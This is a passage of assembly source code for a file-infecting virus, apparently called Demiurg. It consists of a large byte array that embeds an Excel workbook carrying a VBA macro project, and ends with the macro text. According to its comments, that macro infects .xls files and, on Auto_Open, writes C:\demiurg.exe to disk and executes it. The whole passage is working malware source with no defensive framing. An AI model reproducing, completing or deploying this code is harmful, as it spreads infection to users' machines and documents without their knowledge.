053h db 000h, 04Fh, 000h, 046h, 000h, 054h, 000h, 020h db 000h, 04Fh, 000h, 046h, 000h, 046h, 000h, 049h db 000h, 043h, 000h, 045h, 000h, 05Ch, 000h, 04Fh db 000h, 046h, 000h, 046h, 000h, 049h, 000h, 043h db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 053h db 000h, 04Fh, 000h, 039h, 000h, 037h, 000h, 02Eh db 000h, 044h, 000h, 04Ch, 000h, 04Ch, 000h, 023h db 000h, 04Dh, 000h, 069h, 000h, 063h, 000h, 072h db 000h, 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h db 000h, 074h, 000h, 020h, 000h, 04Fh, 000h, 066h db 000h, 066h, 000h, 069h, 000h, 063h, 000h, 065h db 000h, 020h, 000h, 038h, 000h, 02Eh, 000h, 030h db 000h, 020h, 000h, 04Fh, 000h, 062h, 000h, 06Ah db 000h, 065h, 000h, 063h, 000h, 074h, 000h, 020h db 000h, 04Ch, 000h, 069h, 000h, 062h, 000h, 072h db 000h, 061h, 000h, 072h, 000h, 079h, 0E6h, 00Dh db 000h, 003h, 000h, 002h, 000h, 002h, 000h, 001h db 000h, 003h, 000h, 004h, 002h, 000h, 000h, 006h db 002h, 001h, 000h, 008h, 002h, 000h, 000h, 010h db 002h, 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh db 0FFh, 000h, 000h, 0E8h, 005h, 0C0h, 038h, 003h db 000h, 0E6h, 00Ah, 0FFh, 000h, 000h, 001h, 000h db 0E6h, 026h, 0FFh, 002h, 000h, 0E6h, 00Ah, 0FFh db 001h, 0E6h, 013h, 000h, 0B5h, 031h, 003h, 000h db 022h, 000h, 044h, 000h, 069h, 000h, 065h, 000h db 073h, 000h, 065h, 000h, 041h, 000h, 072h, 000h db 062h, 000h, 065h, 000h, 069h, 000h, 074h, 000h db 073h, 000h, 06Dh, 000h, 061h, 000h, 070h, 000h db 070h, 000h, 065h, 000h, 00Ah, 000h, 034h, 033h db 038h, 063h, 030h, 030h, 035h, 065h, 038h, 000h db 003h, 000h, 02Ah, 044h, 001h, 015h, 002h, 0FFh db 0FFh, 0B7h, 031h, 0E6h, 007h, 000h, 002h, 000h db 000h, 000h, 01Fh, 003h, 000h, 000h, 0FFh, 0FFh db 010h, 000h, 054h, 000h, 061h, 000h, 062h, 000h db 065h, 000h, 06Ch, 000h, 06Ch, 000h, 065h, 000h db 031h, 000h, 00Ah, 000h, 035h, 033h, 038h, 063h db 030h, 030h, 035h, 065h, 038h, 000h, 003h, 000h db 02Ah, 044h, 001h, 019h, 002h, 0FFh, 0FFh, 0B9h db 031h, 0E6h, 006h, 000h, 018h, 002h, 000h, 000h db 000h, 01Fh, 003h, 000h, 000h, 0FFh, 0FFh, 00Eh db 000h, 044h, 000h, 065h, 000h, 06Dh, 000h, 069h db 000h, 075h, 000h, 072h, 000h, 067h, 000h, 00Ah db 000h, 064h, 033h, 038h, 063h, 030h, 030h, 035h db 066h, 036h, 000h, 003h, 000h, 02Ah, 044h, 001h db 01Ch, 002h, 0FFh, 0FFh, 0BBh, 031h, 0E6h, 006h db 000h, 030h, 002h, 000h, 000h, 000h, 0B7h, 005h db 000h, 000h, 0E6h, 006h, 0FFh, 001h, 001h, 050h db 002h, 000h, 000h, 0E6h, 0D8h, 0FFh, 000h, 002h db 000h, 000h, 0E6h, 004h, 0FFh, 018h, 002h, 000h db 000h, 0E6h, 004h, 0FFh, 030h, 002h, 000h, 000h db 0E6h, 0FFh, 0FFh, 0E6h, 015h, 0FFh, 0E7h, 06Eh db 0E4h, 0D9h, 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h db 0A6h, 0F3h, 0DDh, 0ADh, 082h, 039h, 0E6h, 004h db 0FFh, 001h, 000h, 000h, 000h, 0E9h, 06Eh, 0E4h db 0D9h, 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h, 0A6h db 0F3h, 0DDh, 0ADh, 082h, 039h, 0E6h, 004h, 0FFh db 001h, 000h, 000h, 000h, 0EBh, 06Eh, 0E4h, 0D9h db 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h, 0A6h, 0F3h db 0DDh, 0ADh, 082h, 039h, 0E6h, 004h, 0FFh, 001h db 000h, 000h, 000h, 0E6h, 004h, 0FFh, 030h, 000h db 000h, 000h, 080h, 0E6h, 005h, 000h, 020h, 001h db 021h, 000h, 0FFh, 000h, 0B8h, 028h, 000h, 000h db 005h, 004h, 045h, 078h, 063h, 065h, 06Ch, 080h db 02Bh, 010h, 000h, 003h, 004h, 056h, 042h, 041h db 0F7h, 0E2h, 010h, 000h, 005h, 004h, 057h, 069h db 06Eh, 031h, 036h, 0C1h, 07Eh, 010h, 000h, 005h db 004h, 057h, 069h, 06Eh, 033h, 032h, 007h, 07Fh db 010h, 000h, 003h, 004h, 04Dh, 061h, 063h, 0B3h db 0B2h, 010h, 000h, 008h, 004h, 050h, 072h, 06Fh db 06Ah, 065h, 06Bh, 074h, 031h, 0D2h, 041h, 010h db 000h, 006h, 004h, 073h, 074h, 064h, 06Fh, 06Ch db 065h, 093h, 060h, 010h, 000h, 007h, 000h, 04Dh db 053h, 046h, 06Fh, 072h, 06Dh, 073h, 043h, 00Fh db 010h, 000h, 00Ah, 004h, 056h, 042h, 041h, 050h db 072h, 06Fh, 06Ah, 065h, 063h, 074h, 0BEh, 0BFh db 010h, 000h, 006h, 004h, 04Fh, 066h, 066h, 069h db 063h, 065h, 015h, 075h, 010h, 000h, 011h, 004h db 044h, 069h, 065h, 073h, 065h, 041h, 072h, 062h db 065h, 069h, 074h, 073h, 06Dh, 061h, 070h, 070h db 065h, 0AFh, 081h, 010h, 000h, 009h, 080h, 000h db 000h, 0FFh, 003h, 001h, 000h, 05Fh, 045h, 076h db 061h, 06Ch, 075h, 061h, 074h, 065h, 018h, 0D9h db 010h, 000h, 008h, 004h, 054h, 061h, 062h, 065h db 06Ch, 06Ch, 065h, 031h, 052h, 08Ah, 010h, 000h db 006h, 004h, 04Dh, 06Fh, 064h, 075h, 06Ch, 031h db 0CDh, 01Eh, 010h, 000h, 007h, 004h, 044h, 065h db 06Dh, 069h, 075h, 072h, 067h, 01Dh, 017h, 010h db 000h, 009h, 004h, 041h, 075h, 074h, 06Fh, 05Fh db 04Fh, 070h, 065h, 06Eh, 056h, 020h, 010h, 000h db 00Bh, 000h, 041h, 070h, 070h, 06Ch, 069h, 063h db 061h, 074h, 069h, 06Fh, 06Eh, 0A5h, 02Ah, 010h db 000h, 00Fh, 000h, 04Fh, 06Eh, 053h, 068h, 065h db 065h, 074h, 041h, 063h, 074h, 069h, 076h, 061h db 074h, 065h, 0FAh, 06Eh, 010h, 000h, 00Ah, 004h db 041h, 075h, 074h, 06Fh, 05Fh, 043h, 06Ch, 06Fh db 073h, 065h, 077h, 080h, 010h, 000h, 00Ch, 000h db 041h, 063h, 074h, 069h, 076h, 065h, 057h, 069h db 06Eh, 064h, 06Fh, 077h, 0C3h, 02Bh, 010h, 000h db 007h, 000h, 056h, 069h, 073h, 069h, 062h, 06Ch db 065h, 0B6h, 0D3h, 010h, 000h, 006h, 004h, 049h db 06Eh, 066h, 065h, 063h, 074h, 0E8h, 066h, 010h db 000h, 00Dh, 000h, 044h, 069h, 073h, 070h, 06Ch db 061h, 079h, 041h, 06Ch, 065h, 072h, 074h, 073h db 0F4h, 0F6h, 010h, 000h, 008h, 000h, 06Ch, 061h db 073h, 074h, 063h, 068h, 061h, 072h, 013h, 09Ah db 010h, 000h, 003h, 000h, 041h, 073h, 063h, 021h db 075h, 010h, 000h, 00Eh, 000h, 041h, 063h, 074h db 069h, 076h, 065h, 057h, 06Fh, 072h, 06Bh, 062h db 06Fh, 06Fh, 06Bh, 013h, 0A2h, 010h, 000h, 001h db 000h, 069h, 060h, 010h, 010h, 000h, 009h, 000h db 056h, 042h, 050h, 072h, 06Fh, 06Ah, 065h, 063h db 074h, 04Fh, 068h, 010h, 000h, 00Ch, 000h, 056h db 042h, 043h, 06Fh, 06Dh, 070h, 06Fh, 06Eh, 065h db 06Eh, 074h, 073h, 00Ah, 027h, 010h, 000h, 005h db 000h, 063h, 06Fh, 075h, 06Eh, 074h, 030h, 076h db 010h, 000h, 006h, 000h, 049h, 06Dh, 070h, 06Fh db 072h, 074h, 069h, 0C5h, 010h, 000h, 004h, 000h db 053h, 061h, 076h, 065h, 092h, 0D0h, 010h, 000h db 008h, 004h, 057h, 06Fh, 072h, 06Bh, 062h, 06Fh db 06Fh, 06Bh, 06Bh, 018h, 010h, 000h, 002h, 0FFh db 0FFh, 001h, 001h, 06Ch, 000h, 000h, 000h, 01Dh db 002h, 002h, 000h, 010h, 000h, 0E6h, 012h, 0FFh db 000h, 002h, 001h, 000h, 0FFh, 0FFh, 002h, 002h db 000h, 000h, 0E6h, 01Ah, 0FFh, 00Ch, 002h, 002h db 000h, 0FFh, 0FFh, 00Eh, 002h, 003h, 000h, 0FFh db 0FFh, 010h, 002h, 0E6h, 004h, 0FFh, 012h, 002h db 004h, 000h, 0FFh, 0FFh, 015h, 002h, 000h, 000h db 00Eh, 000h, 0E6h, 006h, 0FFh, 019h, 002h, 001h db 000h, 00Eh, 000h, 0E6h, 006h, 0FFh, 000h, 000h db 012h, 000h, 000h, 000h, 001h, 000h, 036h, 0E6h db 060h, 000h, 001h, 0C6h, 0B2h, 080h, 001h, 000h db 004h, 000h, 000h, 000h, 001h, 000h, 030h, 02Ah db 002h, 002h, 090h, 009h, 000h, 070h, 014h, 006h db 048h, 003h, 000h, 082h, 002h, 000h, 064h, 0E4h db 004h, 004h, 000h, 00Ah, 000h, 01Ch, 000h, 056h db 042h, 041h, 050h, 072h, 06Fh, 06Ah, 065h, 088h db 063h, 074h, 005h, 000h, 034h, 000h, 000h, 040h db 002h, 014h, 06Ah, 006h, 002h, 00Ah, 03Dh, 002h db 00Ah, 007h, 002h, 072h, 001h, 014h, 008h, 005h db 006h, 012h, 009h, 002h, 012h, 0E8h, 005h, 0C0h db 038h, 003h, 094h, 000h, 00Ch, 002h, 04Ah, 03Ch db 002h, 00Ah, 016h, 000h, 001h, 072h, 080h, 073h db 074h, 064h, 06Fh, 06Ch, 065h, 03Eh, 002h, 019h db 000h, 073h, 000h, 074h, 000h, 064h, 000h, 06Fh db 000h, 080h, 06Ch, 000h, 065h, 000h, 00Dh, 000h db 066h, 000h, 025h, 002h, 05Ch, 000h, 003h, 02Ah db 05Ch, 047h, 07Bh, 030h, 030h, 080h, 030h, 032h db 030h, 034h, 033h, 030h, 02Dh, 000h, 008h, 01Dh db 004h, 004h, 043h, 000h, 00Ah, 002h, 00Eh, 001h db 012h, 030h, 030h, 034h, 000h, 036h, 07Dh, 023h db 032h, 02Eh, 030h, 023h, 030h, 000h, 023h, 043h db 03Ah, 05Ch, 057h, 049h, 04Eh, 044h, 000h, 04Fh db 057h, 053h, 05Ch, 053h, 059h, 053h, 054h, 000h db 045h, 04Dh, 05Ch, 053h, 054h, 044h, 04Fh, 04Ch db 080h, 045h, 032h, 02Eh, 054h, 04Ch, 042h, 023h db 000h, 008h, 000h, 020h, 041h, 075h, 074h, 06Fh db 06Dh, 061h, 074h, 018h, 069h, 06Fh, 06Eh, 000h db 05Eh, 000h, 001h, 016h, 000h, 007h, 001h, 080h db 002h, 04Dh, 053h, 046h, 06Fh, 072h, 06Dh, 073h db 008h, 03Eh, 000h, 00Eh, 001h, 006h, 000h, 053h db 000h, 046h, 001h, 000h, 045h, 072h, 000h, 06Dh db 000h, 073h, 000h, 02Fh, 034h, 000h, 07Ah, 080h db 009h, 070h, 080h, 001h, 001h, 046h, 036h, 032h db 000h, 041h, 033h, 032h, 043h, 036h, 032h, 02Dh db 041h, 000h, 033h, 036h, 044h, 02Dh, 031h, 031h db 044h, 033h, 000h, 02Dh, 041h, 035h, 030h, 030h db 02Dh, 041h, 036h, 000h, 046h, 033h, 044h, 044h db 041h, 044h, 038h, 032h, 00Ch, 033h, 039h, 017h db 046h, 004h, 033h, 02Eh, 054h, 057h, 044h, 000h db 023h, 04Dh, 069h, 063h, 072h, 06Fh, 073h, 06Fh db 028h, 066h, 074h, 020h, 002h, 03Dh, 020h, 000h db 060h, 020h, 04Fh, 002h, 062h, 001h, 0B0h, 020h db 04Ch, 069h, 062h, 072h, 061h, 01Ch, 072h, 079h db 000h, 039h, 000h, 001h, 01Eh, 050h, 030h, 000h db 090h, 07Dh, 000h, 013h, 072h, 080h, 001h, 008h db 050h, 000h, 04Bh, 02Ah, 050h, 080h, 04Ah, 050h db 020h, 05Ch, 056h, 042h, 045h, 05Ch, 085h, 028h db 045h, 058h, 001h, 0A7h, 028h, 0E1h, 02Eh, 045h db 00Dh, 08Fh, 0E0h, 01Ah, 000h, 010h, 085h, 02Eh db 002h, 060h, 08Ch, 04Dh, 00Bh, 006h, 0B4h, 041h db 094h, 043h, 078h, 04Fh, 066h, 066h, 069h, 063h db 005h, 044h, 078h, 04Fh, 040h, 075h, 066h, 000h db 069h, 000h, 063h, 015h, 042h, 078h, 08Ch, 0C0h db 02Bh, 082h, 0C4h, 02Ch, 032h, 044h, 046h, 000h db 038h, 044h, 030h, 034h, 043h, 02Dh, 035h, 042h db 000h, 046h, 041h, 02Dh, 031h, 030h, 031h, 042h db 02Dh, 090h, 064h, 000h, 069h, 000h, 072h, 0E6h db 03Bh, 000h, 008h, 000h, 002h, 000h, 0E6h, 00Ch db 0FFh, 0E6h, 024h, 000h, 099h, 000h, 000h, 000h db 0CAh, 002h, 0E6h, 006h, 000h, 050h, 000h, 052h db 000h, 04Fh, 000h, 04Ah, 000h, 045h, 000h, 043h db 000h, 054h, 000h, 077h, 000h, 06Dh, 0E6h, 02Fh db 000h, 014h, 000h, 002h, 000h, 0E6h, 00Ch, 0FFh db 0E6h, 024h, 000h, 0A5h, 000h, 000h, 000h, 06Bh db 0E6h, 007h, 000h, 050h, 000h, 052h, 000h, 04Fh db 000h, 04Ah, 000h, 045h, 000h, 043h, 000h, 054h db 0E6h, 033h, 000h, 010h, 000h, 002h, 001h, 003h db 000h, 000h, 000h, 009h, 000h, 000h, 000h, 0E6h db 004h, 0FFh, 0E6h, 024h, 000h, 0A7h, 000h, 000h db 000h, 0B8h, 001h, 0E6h, 006h, 000h, 005h, 000h db 053h, 000h, 075h, 000h, 06Dh, 000h, 06Dh, 000h db 061h, 000h, 072h, 000h, 079h, 000h, 049h, 000h db 06Eh, 000h, 066h, 000h, 06Fh, 000h, 072h, 000h db 06Dh, 000h, 061h, 000h, 074h, 000h, 069h, 000h db 06Fh, 000h, 06Eh, 0E6h, 01Bh, 000h, 028h, 000h db 002h, 001h, 0E6h, 004h, 0FFh, 00Ch, 000h, 000h db 000h, 0E6h, 004h, 0FFh, 0E6h, 024h, 000h, 0AEh db 000h, 000h, 000h, 0B4h, 0E6h, 007h, 000h, 042h db 044h, 045h, 035h, 040h, 078h, 041h, 041h, 040h db 077h, 00Ah, 034h, 0C0h, 002h, 032h, 008h, 055h db 050h, 052h, 04Fh, 047h, 010h, 052h, 041h, 04Dh db 04Dh, 000h, 02Bh, 049h, 043h, 052h, 000h, 04Fh db 053h, 04Fh, 046h, 054h, 020h, 04Fh, 046h, 020h db 046h, 049h, 043h, 045h, 05Ch, 084h, 001h, 04Dh db 053h, 080h, 04Fh, 039h, 037h, 02Eh, 044h, 04Ch db 04Ch, 048h, 059h, 0A1h, 083h, 022h, 020h, 038h db 02Eh, 030h, 092h, 059h, 00Fh, 042h, 0BBh, 008h db 003h, 000h, 013h, 0C2h, 001h, 0B5h, 031h, 019h db 000h, 002h, 011h, 040h, 027h, 044h, 069h, 065h db 073h, 065h, 041h, 000h, 072h, 062h, 065h, 069h db 074h, 073h, 06Dh, 061h, 010h, 070h, 070h, 065h db 01Ah, 093h, 005h, 032h, 000h, 022h, 00Bh, 041h db 00Bh, 040h, 037h, 065h, 080h, 08Ch, 065h, 000h db 041h, 000h, 0A8h, 072h, 000h, 062h, 0C0h, 039h db 069h, 040h, 0B5h, 073h, 080h, 091h, 088h, 061h db 000h, 070h, 040h, 000h, 065h, 000h, 01Ch, 040h db 009h, 028h, 000h, 000h, 048h, 042h, 001h, 031h db 0C2h, 0C6h, 01Fh, 003h, 058h, 000h, 000h, 01Eh db 042h, 002h, 001h, 005h, 02Ch, 042h, 01Fh, 0B7h db 022h, 031h, 041h, 013h, 000h, 000h, 02Bh, 0C2h db 009h, 019h, 000h, 002h, 008h, 0C0h, 001h, 054h db 061h, 062h, 065h, 06Ch, 06Ch, 088h, 065h, 031h db 01Ah, 04Ah, 003h, 032h, 000h, 010h, 0C1h, 006h db 054h, 000h, 061h, 042h, 01Bh, 06Ch, 042h, 0CFh db 031h, 064h, 019h, 0B9h, 005h, 04Ch, 019h, 007h db 020h, 009h, 044h, 065h, 06Dh, 069h, 075h, 058h db 072h, 067h, 01Ah, 082h, 062h, 084h, 001h, 032h db 082h, 062h, 044h, 055h, 0A0h, 019h, 06Dh, 0E0h db 01Bh, 075h, 020h, 01Bh, 067h, 030h, 00Ch, 0B7h db 0E3h, 0C0h, 082h, 0EDh, 018h, 0BBh, 031h, 021h db 060h, 00Ah, 0E5h, 018h, 021h, 015h, 0E6h, 039h db 000h, 044h, 069h, 065h, 073h, 065h, 041h, 072h db 062h, 065h, 069h, 074h, 073h, 06Dh, 061h, 070h db 070h, 065h, 000h, 044h, 000h, 069h, 000h, 065h db 000h, 073h, 000h, 065h, 000h, 041h, 000h, 072h db 000h, 062h, 000h, 065h, 000h, 069h, 000h, 074h db 000h, 073h, 000h, 06Dh, 000h, 061h, 000h, 070h db 000h, 070h, 000h, 065h, 000h, 000h, 000h, 054h db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 000h db 054h, 000h, 061h, 000h, 062h, 000h, 065h, 000h db 06Ch, 000h, 06Ch, 000h, 065h, 000h, 031h, 000h db 000h, 000h, 044h, 065h, 06Dh, 069h, 075h, 072h db 067h, 000h, 044h, 000h, 065h, 000h, 06Dh, 000h db 069h, 000h, 075h, 000h, 072h, 000h, 067h, 0E6h db 01Ah, 000h, 049h, 044h, 03Dh, 022h, 07Bh, 044h db 039h, 045h, 034h, 036h, 045h, 046h, 030h, 02Dh db 046h, 031h, 033h, 041h, 02Dh, 031h, 031h, 044h db 033h, 02Dh, 041h, 035h, 030h, 031h, 02Dh, 041h db 036h, 046h, 033h, 044h, 044h, 041h, 044h, 038h db 032h, 033h, 039h, 07Dh, 022h, 00Dh, 00Ah, 044h db 06Fh, 063h, 075h, 06Dh, 065h, 06Eh, 074h, 03Dh db 044h, 069h, 065h, 073h, 065h, 041h, 072h, 062h db 065h, 069h, 074h, 073h, 06Dh, 061h, 070h, 070h db 065h, 02Fh, 026h, 048h, 0E6h, 008h, 030h, 00Dh db 00Ah, 044h, 06Fh, 063h, 075h, 06Dh, 065h, 06Eh db 074h, 03Dh, 054h, 061h, 062h, 065h, 06Ch, 06Ch db 065h, 031h, 02Fh, 026h, 048h, 0E6h, 008h, 030h db 00Dh, 00Ah, 04Dh, 06Fh, 064h, 075h, 06Ch, 065h db 03Dh, 044h, 065h, 06Dh, 069h, 075h, 072h, 067h db 00Dh, 00Ah, 04Eh, 061h, 06Dh, 065h, 03Dh, 022h db 056h, 042h, 041h, 050h, 072h, 06Fh, 06Ah, 065h db 063h, 074h, 022h, 00Dh, 00Ah, 048h, 065h, 06Ch db 070h, 043h, 06Fh, 06Eh, 074h, 065h, 078h, 074h db 049h, 044h, 03Dh, 022h, 030h, 022h, 00Dh, 00Ah db 043h, 04Dh, 047h, 03Dh, 022h, 039h, 039h, 039h db 042h, 039h, 038h, 039h, 038h, 039h, 043h, 039h db 038h, 039h, 043h, 039h, 038h, 039h, 043h, 039h db 038h, 039h, 043h, 022h, 00Dh, 00Ah, 044h, 050h db 042h, 03Dh, 022h, 033h, 032h, 033h, 030h, 033h db 033h, 041h, 038h, 043h, 044h, 041h, 039h, 043h db 044h, 041h, 039h, 043h, 044h, 022h, 00Dh, 00Ah db 047h, 043h, 03Dh, 022h, 043h, 042h, 043h, 039h db 043h, 041h, 035h, 033h, 036h, 032h, 035h, 034h db 036h, 032h, 035h, 034h, 039h, 044h, 022h, 00Dh db 00Ah, 00Dh, 00Ah, 05Bh, 048h, 06Fh, 073h, 074h db 020h, 045h, 078h, 074h, 065h, 06Eh, 064h, 065h db 072h, 020h, 049h, 06Eh, 066h, 06Fh, 05Dh, 00Dh db 00Ah, 026h, 048h, 0E6h, 007h, 030h, 031h, 03Dh db 07Bh, 033h, 038h, 033h, 032h, 044h, 036h, 034h db 030h, 02Dh, 043h, 046h, 039h, 030h, 02Dh, 031h db 031h, 043h, 046h, 02Dh, 038h, 045h, 034h, 033h db 02Dh, 030h, 030h, 041h, 030h, 043h, 039h, 031h db 031h, 030h, 030h, 035h, 041h, 07Dh, 03Bh, 056h db 042h, 045h, 03Bh, 026h, 048h, 0E6h, 008h, 030h db 00Dh, 00Ah, 00Dh, 00Ah, 05Bh, 057h, 06Fh, 072h db 06Bh, 073h, 070h, 061h, 063h, 065h, 05Dh, 00Dh db 00Ah, 044h, 069h, 065h, 073h, 065h, 041h, 072h db 062h, 065h, 069h, 074h, 073h, 06Dh, 061h, 070h db 070h, 065h, 03Dh, 030h, 02Ch, 020h, 030h, 02Ch db 020h, 030h, 02Ch, 020h, 030h, 02Ch, 020h, 043h db 00Dh, 00Ah, 054h, 061h, 062h, 065h, 06Ch, 06Ch db 065h, 031h, 03Dh, 030h, 02Ch, 020h, 030h, 02Ch db 020h, 030h, 02Ch, 020h, 030h, 02Ch, 020h, 043h db 00Dh, 00Ah, 044h, 065h, 06Dh, 069h, 075h, 072h db 067h, 03Dh, 032h, 032h, 02Ch, 020h, 032h, 032h db 02Ch, 020h, 034h, 030h, 036h, 02Ch, 020h, 031h db 039h, 031h, 02Ch, 020h, 05Ah, 00Dh, 00Ah, 0E6h db 008h, 000h, 0FEh, 0FFh, 000h, 000h, 004h, 000h db 002h, 0E6h, 011h, 000h, 001h, 000h, 000h, 000h db 0E0h, 085h, 09Fh, 0F2h, 0F9h, 04Fh, 068h, 010h db 0ABh, 091h, 008h, 000h, 02Bh, 027h, 0B3h, 0D9h db 030h, 000h, 000h, 000h, 084h, 000h, 000h, 000h db 006h, 000h, 000h, 000h, 001h, 000h, 000h, 000h db 038h, 000h, 000h, 000h, 004h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 008h, 000h, 000h, 000h db 04Ch, 000h, 000h, 000h, 012h, 000h, 000h, 000h db 058h, 000h, 000h, 000h, 00Ch, 000h, 000h, 000h db 070h, 000h, 000h, 000h, 013h, 000h, 000h, 000h db 07Ch, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 0E4h, 004h, 000h, 000h, 01Eh, 000h, 000h, 000h db 002h, 000h, 000h, 000h, 042h, 000h, 073h, 000h db 01Eh, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 042h, 000h, 073h, 000h, 01Eh, 000h, 000h, 000h db 010h, 000h, 000h, 000h, 04Dh, 069h, 063h, 072h db 06Fh, 073h, 06Fh, 066h, 074h, 020h, 045h, 078h db 063h, 065h, 06Ch, 000h, 040h, 000h, 000h, 000h db 080h, 0ECh, 0E8h, 033h, 03Fh, 085h, 0BFh, 001h db 003h, 0E6h, 013h, 000h, 0FEh, 0FFh, 000h, 000h db 004h, 000h, 002h, 0E6h, 011h, 000h, 002h, 000h db 000h, 000h, 002h, 0D5h, 0CDh, 0D5h, 09Ch, 02Eh db 01Bh, 010h, 093h, 097h, 008h, 000h, 02Bh, 02Ch db 0F9h, 0AEh, 044h, 000h, 000h, 000h, 005h, 0D5h db 0CDh, 0D5h, 09Ch, 02Eh, 01Bh, 010h, 093h, 097h db 008h, 000h, 02Bh, 02Ch, 0F9h, 0AEh, 008h, 001h db 000h, 000h, 0C4h, 000h, 000h, 000h, 009h, 000h db 000h, 000h, 001h, 000h, 000h, 000h, 050h, 000h db 000h, 000h, 00Fh, 000h, 000h, 000h, 058h, 000h db 000h, 000h, 017h, 000h, 000h, 000h, 064h, 000h db 000h, 000h, 00Bh, 000h, 000h, 000h, 06Ch, 000h db 000h, 000h, 010h, 000h, 000h, 000h, 074h, 000h db 000h, 000h, 013h, 000h, 000h, 000h, 07Ch, 000h db 000h, 000h, 016h, 000h, 000h, 000h, 084h, 000h db 000h, 000h, 00Dh, 000h, 000h, 000h, 08Ch, 000h db 000h, 000h, 00Ch, 000h, 000h, 000h, 0A1h, 000h db 000h, 000h, 002h, 000h, 000h, 000h, 0E4h, 004h db 000h, 000h, 01Eh, 000h, 000h, 000h, 001h, 0E6h db 005h, 000h, 06Ch, 000h, 003h, 000h, 000h, 000h db 06Ah, 010h, 008h, 000h, 00Bh, 0E6h, 007h, 000h db 00Bh, 0E6h, 007h, 000h, 00Bh, 0E6h, 007h, 000h db 00Bh, 0E6h, 007h, 000h, 01Eh, 010h, 000h, 000h db 001h, 000h, 000h, 000h, 009h, 000h, 000h, 000h db 054h, 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h db 000h, 00Ch, 010h, 000h, 000h, 002h, 000h, 000h db 000h, 01Eh, 000h, 000h, 000h, 009h, 000h, 000h db 000h, 054h, 061h, 062h, 065h, 06Ch, 06Ch, 065h db 06Eh, 000h, 003h, 000h, 000h, 000h, 001h, 0E6h db 005h, 000h, 098h, 000h, 000h, 000h, 003h, 0E6h db 007h, 000h, 020h, 000h, 000h, 000h, 001h, 000h db 000h, 000h, 036h, 000h, 000h, 000h, 002h, 000h db 000h, 000h, 03Eh, 000h, 000h, 000h, 001h, 000h db 000h, 000h, 002h, 000h, 000h, 000h, 00Ah, 000h db 000h, 000h, 05Fh, 050h, 049h, 044h, 05Fh, 047h db 055h, 049h, 044h, 000h, 002h, 000h, 000h, 000h db 0E4h, 004h, 000h, 000h, 041h, 000h, 000h, 000h db 04Eh, 000h, 000h, 000h, 07Bh, 000h, 044h, 000h db 039h, 000h, 045h, 000h, 034h, 000h, 036h, 000h db 045h, 000h, 046h, 000h, 031h, 000h, 02Dh, 000h db 046h, 000h, 031h, 000h, 033h, 000h, 041h, 000h db 02Dh, 000h, 031h, 000h, 031h, 000h, 044h, 000h db 033h, 000h, 02Dh, 000h, 041h, 000h, 035h, 000h db 030h, 000h, 031h, 000h, 02Dh, 000h, 041h, 000h db 036h, 000h, 046h, 000h, 033h, 000h, 044h, 000h db 044h, 000h, 041h, 000h, 044h, 000h, 038h, 000h db 032h, 000h, 033h, 000h, 039h, 000h, 07Dh, 0E6h db 027h, 000h, 005h, 000h, 044h, 000h, 06Fh, 000h db 063h, 000h, 075h, 000h, 06Dh, 000h, 065h, 000h db 06Eh, 000h, 074h, 000h, 053h, 000h, 075h, 000h db 06Dh, 000h, 06Dh, 000h, 061h, 000h, 072h, 000h db 079h, 000h, 049h, 000h, 06Eh, 000h, 066h, 000h db 06Fh, 000h, 072h, 000h, 06Dh, 000h, 061h, 000h db 074h, 000h, 069h, 000h, 06Fh, 000h, 06Eh, 0E6h db 00Bh, 000h, 038h, 000h, 002h, 000h, 0E6h, 00Ch db 0FFh, 0E6h, 024h, 000h, 0B1h, 000h, 000h, 000h db 0A0h, 001h, 0E6h, 006h, 000h, 001h, 000h, 043h db 000h, 06Fh, 000h, 06Dh, 000h, 070h, 000h, 04Fh db 000h, 062h, 000h, 06Ah, 0E6h, 031h, 000h, 012h db 000h, 002h, 000h, 0E6h, 00Ch, 0FFh, 0E6h, 024h db 000h, 0B8h, 000h, 000h, 000h, 068h, 0E6h, 04Bh db 000h, 0E6h, 00Ch, 0FFh, 0E6h, 074h, 000h, 0E6h db 00Ch, 0FFh, 0E6h, 030h, 000h, 001h, 000h, 0FEh db 0FFh, 003h, 00Ah, 000h, 000h, 0E6h, 004h, 0FFh db 020h, 008h, 002h, 0E6h, 005h, 000h, 0C0h, 0E6h db 006h, 000h, 046h, 01Ch, 000h, 000h, 000h, 04Dh db 069h, 063h, 072h, 06Fh, 073h, 06Fh, 066h, 074h db 020h, 045h, 078h, 063h, 065h, 06Ch, 020h, 038h db 02Eh, 030h, 02Dh, 054h, 061h, 062h, 065h, 06Ch db 06Ch, 065h, 000h, 006h, 000h, 000h, 000h, 042h db 069h, 066h, 066h, 038h, 000h, 00Eh, 000h, 000h db 000h, 045h, 078h, 063h, 065h, 06Ch, 02Eh, 053h db 068h, 065h, 065h, 074h, 02Eh, 038h, 000h, 0F4h db 039h, 0B2h, 071h, 0E6h, 0FFh, 000h, 0E6h, 0A5h db 000h macro_dropper_size EQU ($ - macro_dropper) ; ----- macro code ---------------------------------------------------------- ; ; This is the macro code that will be stored in infected .xls files. It drops ; the PE EXE dropper as C:\demiurg.exe and executes it. This code is ; incomplete, the data of the dropper will be converted to VBA Array ; instructions at the time Excel is infected, and the full VBA code will be ; stored in the file C:\demiurg.sys then; this is the file that will be used ; to infect .xls files by the dropper main_macro_code: db "Attribute VB_Name = ""Demiurg""", 0Dh, 0Ah db "Public a", 0Dh, 0Ah db "Sub Auto_Open()", 0Dh, 0Ah db "Open ""C:\demiurg.exe"" For Binary As #1", 0Dh, 0Ah db "b", 0Dh, 0Ah db "c", 0Dh, 0Ah db "d", 0Dh, 0Ah db "e", 0Dh, 0Ah db "f", 0Dh, 0Ah db "g", 0Dh, 0Ah db "Close #1", 0Dh, 0Ah db "t=Shell(""C:\demiurg.exe"",vbNormalFocus)", 0Dh, 0Ah db "End Sub", 0Dh, 0Ah db "Sub w()", 0Dh, 0Ah db "For i=0 To 127", 0Dh, 0Ah db "v$=Chr$(a(i))", 0Dh, 0Ah db "Put #1,,v$", 0Dh, 0Ah db "Next", 0Dh, 0Ah end_sub: db "End Sub", 0Dh, 0Ah main_macro_code_size EQU ($ - main_macro_code) 